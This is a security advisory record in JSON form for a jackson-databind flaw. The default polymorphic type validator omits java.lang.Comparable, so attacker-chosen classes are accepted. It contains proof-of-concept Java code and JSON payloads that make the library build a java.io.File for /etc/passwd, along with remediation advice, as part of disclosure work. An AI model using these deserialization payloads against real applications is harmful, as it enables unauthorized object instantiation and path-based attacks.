{"id":"GHSA-gx83-3vf8-gh7j","summary":"jackson-databind: Comparable missing from DefaultBaseTypeLimitingValidator's unsafe base types (incomplete PolymorphicTypeValidator denylist)","details":"### Summary\n`DefaultBaseTypeLimitingValidator` — the `PolymorphicTypeValidator` used automatically whenever `@JsonTypeInfo` is applied without an explicitly configured custom validator — denies polymorphic resolution only for nine specific \"unsafe base types\" (`Object`, `Serializable`, `Closeable`, `AutoCloseable`, `Cloneable`, `Runnable`, `java.util.logging.Handler`, `javax.naming.Referenceable`, `javax.sql.DataSource`). Its `isSafeSubType()` returns `true` unconditionally for every other base type. `java.lang.Comparable` is not in that list, despite being implemented by a very large fraction of JDK and application classes — comparable in breadth to `Serializable`, which is denylisted for exactly that reason. An application with an `@JsonTypeInfo`-annotated `Comparable`-typed property, and no custom validator configured, will accept a type identifier for essentially any class implementing `Comparable`.\n\n### Details\n**Affected file:** `src/main/java/tools/jackson/databind/jsontype/DefaultBaseTypeLimitingValidator.java`\n\n```java\nprivate final static class UnsafeBaseTypes {\n    private final Set\u003cString\u003e UNSAFE = new HashSet\u003c\u003e();\n    {\n        UNSAFE.add(Object.class.getName());\n        UNSAFE.add(java.io.Closeable.class.getName());\n        UNSAFE.add(java.io.Serializable.class.getName());\n        UNSAFE.add(AutoCloseable.class.getName());\n        UNSAFE.add(Cloneable.class.getName());\n        UNSAFE.add(Runnable.class.getName());          // [databind#5014]\n        UNSAFE.add(\"java.util.logging.Handler\");\n        UNSAFE.add(\"javax.naming.Referenceable\");\n        UNSAFE.add(\"javax.sql.DataSource\");\n        // java.lang.Comparable is NOT present here\n    }\n}\n\nprotected boolean isSafeSubType(DatabindContext ctxt,\n        JavaType baseType, JavaType subType) {\n    return true;   // unconditional for every base type not in UNSAFE\n}\n```\n\nThe class's own JavaDoc acknowledges the design (*\"Note that when using potentially unsafe base type like `java.lang.Object` a custom implementation... is needed\"*), so the trade-off of leaving broad base types unrestricted is intentional. The gap is that `Comparable` has the same breadth of implementers as the types this class *does* restrict, and its absence looks like an oversight rather than a deliberate choice — consistent with the ongoing, incremental nature of this list (`Runnable` was added recently for issue #5014).\n\nThis is specific to the **default, unconfigured validator** reached via bare `@JsonTypeInfo` usage. Global \"Default Typing\" via `activateDefaultTyping()` is **not** affected, because that method structurally requires an explicit `PolymorphicTypeValidator` argument — a correctly-configured `BasicPolymorphicTypeValidator` rejects the same payload under `activateDefaultTyping()`.\n\n### PoC\nBuilt entirely from source (jackson-databind + jackson-core + jackson-annotations, `javac`, OpenJDK 21, no third-party gadget libraries, no network access):\n\n**1. Sanity check (benign class, confirms the mechanism fires):**\n```java\nstatic class SafeThing implements Comparable\u003cSafeThing\u003e {\n    public String name;\n    public SafeThing() {}\n    public int compareTo(SafeThing o) { return 0; }\n}\nstatic class Holder {\n    @JsonTypeInfo(use = JsonTypeInfo.Id.CLASS)\n    public Comparable\u003c?\u003e value;\n}\n\nObjectMapper mapper = JsonMapper.builder().build();   // no custom PTV\nString json = \"{\\\"value\\\":{\\\"@class\\\":\\\"...SafeThing\\\",\\\"name\\\":\\\"hello\\\"}}\";\nHolder h = mapper.readValue(json, Holder.class);\n// RESULT: ACCEPTED, class=...SafeThing\n```\n\n**2. Real JDK class substitution:**\n```java\nString json = \"{\\\"value\\\":[\\\"java.io.File\\\",\\\"/etc/passwd\\\"]}\";\nHolder h = mapper.readValue(json, Holder.class);\n// RESULT: ACCEPTED, class=java.io.File value=/etc/passwd\n```\n\n**3. Negative control — Default Typing with an explicit custom PTV:**\n```java\nPolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()\n    .allowIfSubType(\"PtvGapTest4\").build();\nObjectMapper mapper = JsonMapper.builder()\n    .activateDefaultTyping(ptv, DefaultTyping.NON_FINAL).build();\n// same java.io.File payload\n// RESULT: REJECTED - InvalidTypeIdException: \"...denied resolution\"\n```\n\n**Observed output:**\n\n\n\n\n$ java -cp .:build/classes PtvGapTest3\nTrying: {\"value\":[\"java.io.File\",\"/etc/passwd\"]}\nACCEPTED, class=java.io.File value=/etc/passwd\n\n$ java -cp .:build/classes PtvGapTest4\nTrying malicious substitution: [\"PtvGapTest4$Holder\",{\"value\":[\"java.io.File\",\"/etc/passwd\"]}]\nREJECTED - InvalidTypeIdException: Could not resolve type id 'java.io.File' as a\nsubtype of java.lang.Comparable: Configured PolymorphicTypeValidator denied resolution\n\n\n\n\n### Impact\nAny application declaring an `@JsonTypeInfo`-annotated property or class with `Comparable` as its base type, without a separately configured restrictive `PolymorphicTypeValidator`, will accept a type identifier for essentially any class implementing `Comparable`. Concrete impact is demonstrated via `java.io.File`: an attacker can cause construction of a `File` object for an arbitrary, attacker-chosen path. On its own this is a controlled-object-instantiation primitive; if the application later calls path-sensitive or mutating methods on the received value, this becomes a path-traversal-adjacent primitive. \n\n**Suggested remediation:**\n1. Add `java.lang.Comparable` to `UnsafeBaseTypes.UNSAFE`.\n2. Audit other broad JDK interfaces (`java.lang.Iterable`, `java.util.EventListener`) for the same gap.\n3. Consider a narrower default for `isSafeSubType()` for base types outside the fixed denylist, rather than unconditional `true`.","aliases":["CVE-2026-83557"],"modified":"2026-09-28T21:00:06.095378136Z","published":"2026-09-28T20:44:25Z","database_specific":{"nvd_published_at":"2026-09-01T15:17:37Z","cwe_ids":["CWE-502","CWE-915"],"severity":"MODERATE","github_reviewed":true,"github_reviewed_at":"2026-09-28T20:44:25Z"},"references":[{"type":"WEB","url":"https://github.com/FasterXML/jackson-databind/security/advisories/GHSA-gx83-3vf8-gh7j"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-83557"},{"type":"WEB","url":"https://github.com/FasterXML/jackson-databind/issues/6156"},{"type":"WEB","url":"https://github.com/FasterXML/jackson-databind/pull/6155"},{"type":"WEB","url":"https://github.com/FasterXML/jackson-databind/commit/eb3b7fc0f9c0d27f471550ac3316b17d1987388f"},{"type":"PACKAGE","url":"https://github.com/FasterXML/jackson-databind"},{"type":"WEB","url":"https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-2.18.10"},{"type":"WEB","url":"https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-2.21.6"},{"type":"WEB","url":"https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-2.22.2"},{"type":"WEB","url":"https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-3.1.6"},{"type":"WEB","url":"https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-3.2.2"}],"affected":[{"package":{"name":"tools.jackson.core:jackson-databind","ecosystem":"Maven","purl":"pkg:maven/tools.jackson.core/jackson-databind"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"3.0.0"},{"fixed":"3.1.6"}]}],"versions":["3.0.0","3.0.1","3.0.2","3.0.3","3.0.4","3.1.0","3.1.0-rc1","3.1.1","3.1.2","3.1.3","3.1.4","3.1.5"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/09/GHSA-gx83-3vf8-gh7j/GHSA-gx83-3vf8-gh7j.json"}},{"package":{"name":"tools.jackson.core:jackson-databind","ecosystem":"Maven","purl":"pkg:maven/tools.jackson.core/jackson-databind"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"3.2.0"},{"fixed":"3.2.2"}]}],"versions":["3.2.0","3.2.1"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/09/GHSA-gx83-3vf8-gh7j/GHSA-gx83-3vf8-gh7j.json"}},{"package":{"name":"com.fasterxml.jackson.core:jackson-databind","ecosystem":"Maven","purl":"pkg:maven/com.fasterxml.jackson.core/jackson-databind"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"2.11.0"},{"fixed":"2.18.10"}]}],"versions":["2.11.0","2.11.1","2.11.2","2.11.3","2.11.4","2.12.0","2.12.0-rc1","2.12.0-rc2","2.12.1","2.12.2","2.12.3","2.12.4","2.12.5","2.12.6","2.12.6.1","2.12.7","2.12.7.1","2.12.7.2","2.13.0","2.13.0-rc1","2.13.0-rc2","2.13.1","2.13.2","2.13.2.1","2.13.2.2","2.13.3","2.13.4","2.13.4.1","2.13.4.2","2.13.5","2.14.0","2.14.0-rc1","2.14.0-rc2","2.14.0-rc3","2.14.1","2.14.2","2.14.3","2.15.0","2.15.0-rc1","2.15.0-rc2","2.15.0-rc3","2.15.1","2.15.2","2.15.3","2.15.4","2.16.0","2.16.0-rc1","2.16.1","2.16.2","2.17.0","2.17.0-rc1","2.17.1","2.17.2","2.17.3","2.18.0","2.18.0-rc1","2.18.1","2.18.2","2.18.3","2.18.4","2.18.5","2.18.6","2.18.7","2.18.8","2.18.9"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/09/GHSA-gx83-3vf8-gh7j/GHSA-gx83-3vf8-gh7j.json"}},{"package":{"name":"com.fasterxml.jackson.core:jackson-databind","ecosystem":"Maven","purl":"pkg:maven/com.fasterxml.jackson.core/jackson-databind"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"2.19.0"},{"fixed":"2.21.6"}]}],"versions":["2.19.0","2.19.1","2.19.2","2.19.3","2.19.4","2.20.0","2.20.0-rc1","2.20.1","2.20.2","2.21.0","2.21.1","2.21.2","2.21.3","2.21.4","2.21.5"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/09/GHSA-gx83-3vf8-gh7j/GHSA-gx83-3vf8-gh7j.json"}},{"package":{"name":"com.fasterxml.jackson.core:jackson-databind","ecosystem":"Maven","purl":"pkg:maven/com.fasterxml.jackson.core/jackson-databind"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"2.22.0"},{"fixed":"2.22.2"}]}],"versions":["2.22.0","2.22.1"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/09/GHSA-gx83-3vf8-gh7j/GHSA-gx83-3vf8-gh7j.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L"}]}